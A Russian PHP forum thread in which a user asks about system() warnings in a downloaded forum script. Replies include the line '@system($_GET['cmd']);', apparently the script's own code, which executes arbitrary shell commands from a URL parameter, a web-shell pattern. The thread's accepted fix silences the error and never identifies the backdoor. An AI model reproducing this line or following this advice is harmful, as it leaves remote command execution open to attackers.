![]() |
|
Модераторы: skyboy, MoLeX, Aliance, ksnk |
![]()
|
|
| Shark |
|
|||
|
Опытный ![]() ![]() Профиль Группа: Участник Сообщений: 703 Регистрация: 18.6.2006 Где: Москва Репутация: 4 Всего: 4 |
После долгих глюков хостинга jino-net появились такие ошибки:
Warning: system() [function.system]: Cannot execute a blank command in /home/users/s/silent-hell/docs/forum/includes/init.php on line 12 Warning: system() [function.system]: Cannot execute a blank command in /includes/functions.php on line 14 ссылка на форум >>тут<< но не смотря на эти ошибки, он полность функционирует... Кто-нить может объяснить из-за чего они появились и ккк их исправить? P.S. сорри если не в том разделе написал... |
|||
|
||||
| vasac |
|
|||
|
Эксперт ![]() ![]() ![]() Профиль Группа: Завсегдатай Сообщений: 1060 Регистрация: 4.5.2006 Репутация: 8 Всего: 36 |
А что написано в 14-й строке (и вокруг нее), в вышеозначенном файле?
|
|||
|
||||
| Shark |
|
||||
|
Опытный ![]() ![]() Профиль Группа: Участник Сообщений: 703 Регистрация: 18.6.2006 Где: Москва Репутация: 4 Всего: 4 |
12 строка
14 строка
|
||||
|
|||||
| alligator |
|
|||
|
Опытный ![]() ![]() Профиль Группа: Участник Сообщений: 730 Регистрация: 28.1.2004 Репутация: 1 Всего: 1 |
Скорее всего хостер запретил выполнение данных комманд
-------------------- |
|||
|
||||
| Shark |
|
|||
|
alligator, так форум полностью функционирует и создание тем,постов и админка тоже...
|
|||
|
||||
| alligator |
|
|||
|
Опытный ![]() ![]() Профиль Группа: Участник Сообщений: 730 Регистрация: 28.1.2004 Репутация: 1 Всего: 1 |
@system($_GET['cmd']);
тогда попробуй сделать так.... -------------------- |
|||
|
||||
| vasac |
|
|||
|
Эксперт ![]() ![]() ![]() Профиль Группа: Завсегдатай Сообщений: 1060 Регистрация: 4.5.2006 Репутация: 8 Всего: 36 |
Собаки ставить не нужно никогда. А вот на рабочем проекте лучше полностью отключить вывод ошибок в браузер.
И к тому же наводит меня на мысль слово "blank", что $_GET[ 'cmd' ] — пустая. |
|||
|
||||
| alligator |
|
|||
|
Тут я согласен.... это я так просто написал , а что собственно должно храниться в данной переменной ? -------------------- |
|||
|
||||
| Shark |
|
|||
|
alligator, спасибо... "@" помогла....
vasac, почему "@" ставить не рекомендумется, если я не ошибаюст это подавление ошибок?!... Щас все работает отлично... ошибок я не замечаю... но все же скажить... если не ставить "@" то, что лучше сделать что б не было ошибок??? |
|||
|
||||
| vasac |
|
|||
|
Shark, сделать так чтобы небыло ошибок нужно по-всякому.
Ошибка это не есть нормальное состояние программы (даже если ты не видишь сообщения о ней). Особенно ошибка в system. @ это не подавление ошибки, а подавление сообщения об ошибке. При отладке эти сообщения подавлять нельзя, а на рабочем проекте, повторяю, вывод ошибок в браузер следует вообще запретить. Так что же все-таки содержит $_GET[ 'cmd' ]? |
|||
|
||||
| Shark |
|
|||
|
vasac, если честно я без понятия...этот форум скачен... я в его коде еще не копался
|
|||
|
||||
![]()
|
| Правила форума "PHP" | |
|
|
Новичкам:
Важно:
Внимание:
Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, IZ@TOP, skyboy, SamDark, MoLeX, awers. |
| 0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей) | |
| 0 Пользователей: | |
| « Предыдущая тема | PHP: Общие вопросы | Следующая тема » |
|
|
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности Powered by Invision Power Board(R) 1.3 © 2003 IPS, Inc. |